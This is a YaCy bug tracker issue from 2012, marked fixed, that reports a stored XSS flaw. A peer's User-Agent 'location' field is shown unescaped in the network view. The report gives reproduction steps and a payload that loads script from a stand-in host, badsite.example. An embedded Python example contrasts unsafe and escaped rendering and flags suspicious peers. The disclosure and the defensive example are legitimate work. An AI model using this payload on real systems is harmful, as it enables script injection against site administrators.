YaCy-Bugtracker - YaCy
View Issue Details
ID: 0000204 | Project: YaCy | Category: Wishlist - Wunschliste | View Status: public | Date Submitted: 2012-08-03 23:08 | Last Update: 2021-10-13 05:44
Reporter: soultcer
Assigned To: Lotus
Priority: normal | Severity: minor | Reproducibility: have not tried
Status: resolved | Resolution: fixed
none 
Product Version: YaCy 1.0
Fixed in Version: YaCy 1.1
0000204: XSS attack YaCy peers using modified User-Agent string
YaCy extracts the "location" from the User-Agent string. This "location" is displayed without any filter in the network view.
1) Modify rogue YaCy instance to report its own User-Agent as 'yacybot (freeworld/global; <script type="text/javascript" src="http://badsite.example/xss.js"></script>)'
2) Contact target peer with rogue YaCy instance.
3) Trick administrator of target peer to visit his network view.
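The report names the two halves of the bug: a field pulled out of a peer's User-Agent and written into the network view without escaping. The Python below is an added illustration, not YaCy's code (YaCy is Java) and not the fix from the commit cited in the note; the yacybot field layout, the 'Continent/cc' allow-list and both sample User-Agent strings are assumptions made for the example.

```python
import html
import re
from typing import Optional

# Constructed sample User-Agent strings (not captured from a real peer). The benign one
# follows an assumed yacybot layout 'yacybot (<network>; <os>; <java>; <location>) <url>';
# the second carries the payload quoted in the report.
BENIGN_UA = ("yacybot (freeworld/global; amd64 Linux 3.2; java 1.7.0_05; Europe/de) "
             "http://yacy.net/bot.html")
MALICIOUS_UA = ('yacybot (freeworld/global; <script type="text/javascript" '
                'src="http://badsite.example/xss.js"></script>)')


def extract_location(user_agent: str) -> Optional[str]:
    """Return the last ';'-separated field inside the yacybot parentheses.
    The field layout is an assumption for this example, not YaCy's parser."""
    match = re.search(r"yacybot \(([^)]*)\)", user_agent)
    if not match:
        return None
    fields = [f.strip() for f in match.group(1).split(";")]
    return fields[-1] or None


def is_plausible_location(location: Optional[str]) -> bool:
    """Assumed allow-list for a 'Continent/cc' value; anything else is untrusted."""
    return bool(location) and re.fullmatch(r"[A-Za-z]+/[A-Za-z]{2,3}", location) is not None


def render_peer_row_unsafe(peer_name: str, user_agent: str) -> str:
    """Vulnerable pattern: peer-supplied text is interpolated straight into HTML."""
    location = extract_location(user_agent) or ""
    return f"<tr><td>{peer_name}</td><td>{location}</td></tr>"


def render_peer_row_safe(peer_name: str, user_agent: str) -> str:
    """Hardened pattern: escape every peer-controlled value at the output boundary,
    so whatever the peer sent is displayed as text and never parsed as markup."""
    location = extract_location(user_agent) or ""
    return (f"<tr><td>{html.escape(peer_name, quote=True)}</td>"
            f"<td>{html.escape(location, quote=True)}</td></tr>")


def flag_suspicious_peers(peers: dict) -> list:
    """Detection side: names of peers whose advertised location fails the allow-list,
    so they can be logged or highlighted for the administrator."""
    return [name for name, ua in peers.items()
            if not is_plausible_location(extract_location(ua))]


if __name__ == "__main__":
    peers = {"peer-a": BENIGN_UA, "rogue": MALICIOUS_UA}
    for name, ua in peers.items():
        print(render_peer_row_safe(name, ua))
    print("suspicious:", flag_suspicious_peers(peers))
```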
No tags attached.
Issue History
2012-08-03 23:08 | soultcer | New Issue
2012-08-14 22:32 | administrator | View Status: private => public
2012-08-15 14:24 | Lotus | Note Added: 0000413
2012-08-15 14:24 | Lotus | Status: new => resolved
2012-08-15 14:24 | Lotus | Fixed in Version: => YaCy 1.1
2012-08-15 14:24 | Lotus | Resolution: open => fixed
2012-08-15 14:24 | Lotus | Assigned To: => Lotus

Notes
(0000413) Lotus | 2012-08-15 14:24
Fix in Commit ae9cd7a1182f853af45dc0a20b93bcdf462b97ca